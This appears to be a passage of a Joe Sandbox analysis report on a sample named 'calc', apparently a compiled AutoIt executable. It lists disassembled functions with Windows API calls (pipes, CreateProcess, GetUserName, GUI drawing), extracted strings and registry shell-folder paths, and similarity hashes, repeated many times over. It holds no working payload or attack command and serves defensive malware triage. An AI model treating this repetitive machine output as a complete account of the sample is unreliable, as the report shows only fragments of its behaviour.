Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 68f1808b20100e82de70a732d53f896afdefe70c9edcaf70261d79a69c1b16a8
Instruction ID: 9693ef09c43c1888ae501eb5287d094d7ef636fd7f1e62dc01fc27b31f94f117
Opcode Fuzzy Hash: 68f1808b20100e82de70a732d53f896afdefe70c9edcaf70261d79a69c1b16a8
Instruction Fuzzy Hash: BEE09B71F04208FBDB00DBB4D845B9E77B89F08329F11016EF915D61D1D678D608465A

Function 0043738E Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 004373A0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d99580a7dd0d604ec6faf33ad263533e198e63e0be265b2dd7bc6d0af1978b66
Instruction ID: d880028efed86599849788da2d52c74bb48a98584789060e47ac239b482ac81e
Opcode Fuzzy Hash: d99580a7dd0d604ec6faf33ad263533e198e63e0be265b2dd7bc6d0af1978b66
Instruction Fuzzy Hash: E3C04CB240810CEFCB50CF80CD88ADE77BCAB08301F1010D69245D2150D7745B44BB25

Function 004422B6 Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b2241c1e3ffc818d66f920908f4ab8d64e9886c298b1664484395dfdf5ffcc
Instruction ID: cb452ce94aa6b4b57d62bf7a907f1812c9957e08c072f4a2a8389e9e0a8bac5f
Opcode Fuzzy Hash: d6b2241c1e3ffc818d66f920908f4ab8d64e9886c298b1664484395dfdf5ffcc
Instruction Fuzzy Hash: 75325936E0011EBBEF09CED5CC80DDDBBB3FB88304F558169E610B2661DAB56A16DB40

Function 00456824 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0975f5892f5e549899d3a88fcccc993e114b020ddf47f2bca1d14cc41228216c
Instruction ID: df1dbaeda81ea60c5014dc966a1e03887f7eb943e26fb73baa63d050f7c57ae7
Opcode Fuzzy Hash: 0975f5892f5e549899d3a88fcccc993e114b020ddf47f2bca1d14cc41228216c
Instruction Fuzzy Hash: FDC1D270D551599EEF289F94C4453BEBBB5EB05307FAA401BEC42A7283C67C4D8AC70A

Function 0043E46A Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef714ef140bed3a7edf10e2793114386ccbd89f9bbb0c1f8b0294978b4860602
Instruction ID: cceca580a8967cbb15a73722b464b36da95cc13c2e9811def82fd2c153b8e359
Opcode Fuzzy Hash: ef714ef140bed3a7edf10e2793114386ccbd89f9bbb0c1f8b0294978b4860602
Instruction Fuzzy Hash: 59D15B32901219DBCF20EF66C8819DD77A5FF58348F51112BFC16A7291D738ED868B89

Function 0044D7D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955673a4e0960d26fe1f61bf3935cae5608d5ce8416ddd6c99d3eadf914ef0d9
Instruction ID: 037fad67c0e599306cd01d3065f0ed8850a48917680de54553801d9a836a0176
Opcode Fuzzy Hash: 955673a4e0960d26fe1f61bf3935cae5608d5ce8416ddd6c99d3eadf914ef0d9
Instruction Fuzzy Hash: 2D21D632900204ABDB14EF69CC858BBBBA5FF44350B0581A9ED559B246E734FA15C7E0

Function 00438A4D Relevance: 63.5, APIs: 34, Strings: 2, Instructions: 474filepipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(00000004,00000008,?,00000000), ref: 00438AFA
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00438B12
GetCurrentProcess.KERNEL32(?,00000000), ref: 00438B1D
DuplicateHandle.KERNEL32(00000000), ref: 00438B20
CloseHandle.KERNEL32(?), ref: 00438B3A
GetStdHandle.KERNEL32(000000F5), ref: 00438B53
CreateFileW.KERNEL32(nul,40000000,00000002,?,00000003,00000080,00000000), ref: 00438B78
CreatePipe.KERNEL32(?,?,?,00000000), ref: 00438BA8
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438BC0
GetCurrentProcess.KERNEL32(?,00000000), ref: 00438BCB
DuplicateHandle.KERNEL32(00000000), ref: 00438BCE
CloseHandle.KERNEL32(?), ref: 00438BE8
GetStdHandle.KERNEL32(000000F4), ref: 00438C01
CreateFileW.KERNEL32(nul,40000000,00000002,?,00000003,00000080,00000000), ref: 00438C26
CreatePipe.KERNEL32(?,?,?,00000000), ref: 00438C56
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438C6E
GetCurrentProcess.KERNEL32(?,00000000), ref: 00438C76
DuplicateHandle.KERNEL32(00000000), ref: 00438C79
CloseHandle.KERNEL32(?), ref: 00438C90
GetStdHandle.KERNEL32(000000F6), ref: 00438CA6
CreateFileW.KERNEL32(nul,80000000,00000001,?,00000003,00000080,00000000), ref: 00438CCB
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00438D4E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 00438E7C
FreeLibrary.KERNEL32(?,00000087,00000000,000000FF), ref: 00438EAE
GetLastError.KERNEL32(00000000,00000000), ref: 00438EC8
CloseHandle.KERNEL32(?), ref: 00438EE8
CloseHandle.KERNEL32(?), ref: 00438F02
CloseHandle.KERNEL32(?), ref: 00438F14
CloseHandle.KERNEL32(?), ref: 00438F26
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00438F40
GetCurrentProcess.KERNEL32(?,00000000), ref: 00438F46
DuplicateHandle.KERNEL32(00000000), ref: 00438F49
CloseHandle.KERNEL32(?), ref: 00438FB4
FreeLibrary.KERNEL32(?), ref: 00438FC2

Strings

nul, xrefs: 00438B73, 00438C21, 00438CC6
su, xrefs: 00438EAE, 00438FC2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Handle$CurrentProcess$Close$Create$Duplicate$FilePipe$FreeLibrary$DirectoryErrorLast
String ID: nul$su
API String ID: 1052312815-2572286161
Opcode ID: 74faca43b3325ccf07435f59371500f109954a2fffff4e36b884906fdbba0335
Instruction ID: 5ecac8a2e4d5a8aa278cd81c89cbfdd016e4fece34d719861e58e5eb322c122d
Opcode Fuzzy Hash: 74faca43b3325ccf07435f59371500f109954a2fffff4e36b884906fdbba0335
Instruction Fuzzy Hash: 8E0289B1500349AFDB10DF64CC85ADABBA8BF08304F08556EF919972A2DB38EC45CB59

Function 0040D33A Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 294windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000136,?,?), ref: 0040D3BF
GetSysColorBrush.USER32(00000005), ref: 0040D3D0
GetClientRect.USER32(?,?), ref: 0040D3E0
SetViewportOrgEx.GDI32(?,00000000,00000000,?), ref: 0040D3F3
FillRect.USER32(?,?,?), ref: 0040D3FD
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040D40B

Strings

EDIT, xrefs: 0040D629
COMBOBOX, xrefs: 0040D613

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: RectViewport$BrushClientColorFillMessageSend
String ID: COMBOBOX$EDIT
API String ID: 636829656-1358951209
Opcode ID: 043c5126e85a944e73dacd84f897b30b06e6abef17b4986d2349f146c263d21c
Instruction ID: 7f2e2f383ff841e78ad89e21c1573881fd4c20705d22ada392839be075dbe60e
Opcode Fuzzy Hash: 043c5126e85a944e73dacd84f897b30b06e6abef17b4986d2349f146c263d21c
Instruction Fuzzy Hash: 1CA16A3190020ABBCF219FE8DC88DAF3BB8EB44341F044536F915B21A1D739DD599B69

Function 00405B07 Relevance: 51.2, APIs: 34, Instructions: 239COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000E), ref: 00405B4A
SetTextColor.GDI32(?,00000000), ref: 00405B52
GetSysColorBrush.USER32(0000000F), ref: 00405B85
GetSysColor.USER32(0000000F), ref: 00405B90
SetBkColor.GDI32(?,?), ref: 00405BA7
SelectObject.GDI32(?,?), ref: 00405BB4
InflateRect.USER32(?,000000FF,000000FF), ref: 00405BD8
GetSysColor.USER32(00000010), ref: 00405BE0
CreateSolidBrush.GDI32(00000000), ref: 00405BE7
FrameRect.USER32(?,?,00000000), ref: 00405BF5
DeleteObject.GDI32(00000000), ref: 00405BFC
InflateRect.USER32(?,000000FE,000000FE), ref: 00405C40
FillRect.USER32(?,00000000,?), ref: 00405C6C

Part of subcall function 0040590B: GetSysColor.USER32(0000000E), ref: 0040592E
Part of subcall function 0040590B: SetTextColor.GDI32(?,00000000), ref: 00405936
Part of subcall function 0040590B: GetSysColorBrush.USER32(0000000F), ref: 0040596C
Part of subcall function 0040590B: GetSysColor.USER32(0000000F), ref: 00405978
Part of subcall function 0040590B: GetSysColor.USER32(00000011), ref: 00405999
Part of subcall function 0040590B: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004059AB
Part of subcall function 0040590B: SelectObject.GDI32(?,00000000), ref: 004059BD
Part of subcall function 0040590B: SetBkColor.GDI32(?,?), ref: 004059C5
Part of subcall function 0040590B: SelectObject.GDI32(?,?), ref: 004059D4
Part of subcall function 0040590B: InflateRect.USER32(?,000000FF,000000FF), ref: 004059F2
Part of subcall function 0040590B: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00405A0D
Part of subcall function 0040590B: SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00405A3E
Part of subcall function 0040590B: GetWindowTextW.USER32(?,00000000,00000001), ref: 00405A59

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelectText$Create$DeleteFillFrameMessageRoundSendSolidWindow
String ID:
API String ID: 2938873313-0
Opcode ID: 553456ab4ca1e89e0d819e2f1f6cc92282432695e87ba36e065eda460ae372a5
Instruction ID: 244f93e74abd21b7a8fd65ac97d11d8a4850837e3841d29fac0a06d5552eaefe
Opcode Fuzzy Hash: 553456ab4ca1e89e0d819e2f1f6cc92282432695e87ba36e065eda460ae372a5
Instruction Fuzzy Hash: 44811872804629FFDF019FA0ED48EAE7B79FB05322F104626F922A61E1D7799940CF54

Function 00407A0B Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 472windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00407AAF
SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00407B01
SendMessageW.USER32(?,0000133D,?,?), ref: 00407B37
DestroyCursor.USER32(?), ref: 00407B44
ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00407BAF
SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00407C1F
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00407CA1
SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00407CCD
GetClientRect.USER32(?,?), ref: 00407CDE
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 00407D3D
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00407D56
DeleteObject.GDI32(?), ref: 00407D64
DestroyCursor.USER32(?), ref: 00407D72
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 00407D96
SendMessageW.USER32(?,000000F7,00000001,?), ref: 00407DAF
DeleteObject.GDI32(?), ref: 00407DBD
DestroyCursor.USER32(?), ref: 00407DCB
ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 00407DF1
DestroyCursor.USER32(?), ref: 00407E12
ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 00407E2E
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00407E5B
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00407E90
SendMessageW.USER32(?,00001003,00000001,00000000), ref: 00407EDA
SendMessageW.USER32(?,00001003,00000000,00000000), ref: 00407F03
SendMessageW.USER32(?,0000104C,00000000,?), ref: 00407F59
SendMessageW.USER32(?,00001015,?,?), ref: 00407F6D
DestroyCursor.USER32(?), ref: 00407F78
DestroyCursor.USER32(?), ref: 00407F7D

Strings

2, xrefs: 00407C9A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$CursorDestroy$ExtractIcon$DeleteImageLoadObject$ClientRect
String ID: 2
API String ID: 3206114824-450215437
Opcode ID: aff11427822101074db3cf344de3680df07f56a710e8f8337fe37fa57c35fd29
Instruction ID: 449b1562671becbc228cbc9511108e771962b84d9fc6a796af91ae0424866a09
Opcode Fuzzy Hash: aff11427822101074db3cf344de3680df07f56a710e8f8337fe37fa57c35fd29
Instruction Fuzzy Hash: 0C024571A04219AFDB11CFA4CC84BEE7BB8BF08710F00456AFA15B72D1D778A950CB99

Function 00436C04 Relevance: 44.0, APIs: 5, Strings: 20, Instructions: 265COMMON

Download Yara Rule

APIs

__time32.LIBCMT ref: 00436C41

Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB

CharUpperBuffW.USER32(0043664B,?,00000002,?,00000000), ref: 00436C59

Strings

Start Menu, xrefs: 00436EF3, 00436F6F
Favorites, xrefs: 00436E7C, 00436F57
Programs, xrefs: 00436EB6, 00436F63
Common AppData, xrefs: 00436DDF
%.3d, xrefs: 00436D81
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00436DB2, 00436DF1, 00436DF6, 00436E1E, 00436E39, 00436E54, 00436E59, 00436E8E, 00436E93, 00436ECB, 00436ED0, 00436F08, 00436F0D, 00436F80
Common Start Menu, xrefs: 00436EC6
Desktop, xrefs: 00436E19, 00436F4B
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00436D92
Common Favorites, xrefs: 00436E4F
Common Desktop, xrefs: 00436DEC
AppData, xrefs: 00436F3F
ProgramFilesDir, xrefs: 00436D8D
Common Documents, xrefs: 00436E34
%.2d, xrefs: 00436D37
Common Startup, xrefs: 00436F03
Startup, xrefs: 00436F30, 00436F7B
Common Programs, xrefs: 00436E89
CommonFilesDir, xrefs: 00436DA1
Personal, xrefs: 00436DAD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Time$BuffCharFileSystemUpper__aulldiv__time32
String ID: %.2d$%.3d$AppData$Common AppData$Common Desktop$Common Documents$Common Favorites$Common Programs$Common Start Menu$Common Startup$CommonFilesDir$Desktop$Favorites$Personal$ProgramFilesDir$Programs$SOFTWARE\Microsoft\Windows\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Start Menu$Startup
API String ID: 2161657684-3228076346
Opcode ID: f7afec519e681cee481e602af3ba30e66b4fa25165008a6563f3cebfe114d443
Instruction ID: 94c72ddd4e8f99876f78adca7abbf7ce8ab67422fd5364023a3b36f69be373fd
Opcode Fuzzy Hash: f7afec519e681cee481e602af3ba30e66b4fa25165008a6563f3cebfe114d443
Instruction Fuzzy Hash: 27913BB1A08208FBDF209A00CC86FEA7634EB04748F659057B546731A1E7BD6E919A5F

Function 0040590B Relevance: 40.7, APIs: 27, Instructions: 172windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000E), ref: 0040592E
SetTextColor.GDI32(?,00000000), ref: 00405936
GetSysColor.USER32(00000012), ref: 00405950
SetTextColor.GDI32(?,00405B21), ref: 00405958
GetSysColorBrush.USER32(0000000F), ref: 0040596C
GetSysColor.USER32(0000000F), ref: 00405978
CreateSolidBrush.GDI32(?), ref: 00405983
GetSysColor.USER32(00000011), ref: 00405999
CreatePen.GDI32(00000000,00000001,00743C00), ref: 004059AB
SelectObject.GDI32(?,00000000), ref: 004059BD
SetBkColor.GDI32(?,?), ref: 004059C5
SelectObject.GDI32(?,?), ref: 004059D4
InflateRect.USER32(?,000000FF,000000FF), ref: 004059F2
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00405A0D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00405A3E
GetWindowTextW.USER32(?,00000000,00000001), ref: 00405A59
InflateRect.USER32(?,000000FD,000000FD), ref: 00405A7B
DrawFocusRect.USER32(?,?), ref: 00405A87
GetSysColor.USER32(00000011), ref: 00405A96
SetTextColor.GDI32(?,00000000), ref: 00405A9E
DrawTextW.USER32(?,?,000000FF,?,?), ref: 00405AB4
SelectObject.GDI32(?,?), ref: 00405AC9
DeleteObject.GDI32(?), ref: 00405AD5
SelectObject.GDI32(?,?), ref: 00405ADC
DeleteObject.GDI32(?), ref: 00405AE2
SetTextColor.GDI32(?,?), ref: 00405AE9
SetBkColor.GDI32(?,?), ref: 00405AF4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflate$FocusMessageRoundSendSolidWindow
String ID:
API String ID: 1441705042-0
Opcode ID: 885b3a8753f4c661a3ae0567f457580ae1d533f7fd3ee976a901b4b308742a30
Instruction ID: 6c58bee66d785cfda33b29ccf49808c69a7ed797e4659f5d7d1f827d9b486f44
Opcode Fuzzy Hash: 885b3a8753f4c661a3ae0567f457580ae1d533f7fd3ee976a901b4b308742a30
Instruction Fuzzy Hash: B7516E72408705FFD7019F60DC48A5BBBA9FB89322F100929F662921E1D776DD50CF59

Function 0042C822 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 300windowCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042C94B
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0042C988
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000001), ref: 0042C999
CreateWindowExW.USER32(00000001,AutoIt v3,00000000,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0042C9E2
GetClientRect.USER32(00000000,?), ref: 0042C9EE
CreateWindowExW.USER32(00000000,static,00000000,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0042CA37
GetStockObject.GDI32(00000011), ref: 0042CA50
SelectObject.GDI32(00000000,00000000), ref: 0042CA58
GetTextFaceW.GDI32(00000000,00000040,?), ref: 0042CA68
DeleteDC.GDI32(00000000), ref: 0042CA7B
CreateFontW.GDI32(00000001,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0042CAA8
SendMessageW.USER32(00000030,00000000,00000001), ref: 0042CABF
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0042CAF2
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0042CB05
SendMessageW.USER32(00000404,00000001,00000000), ref: 0042CB15
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0042CB43
GetStockObject.GDI32(00000011), ref: 0042CB4E
SendMessageW.USER32(00000030,00000000), ref: 0042CB5D
ShowWindow.USER32(00000004), ref: 0042CB67

Strings

DISPLAY, xrefs: 0042CA3C
msctls_progress32, xrefs: 0042CAE8
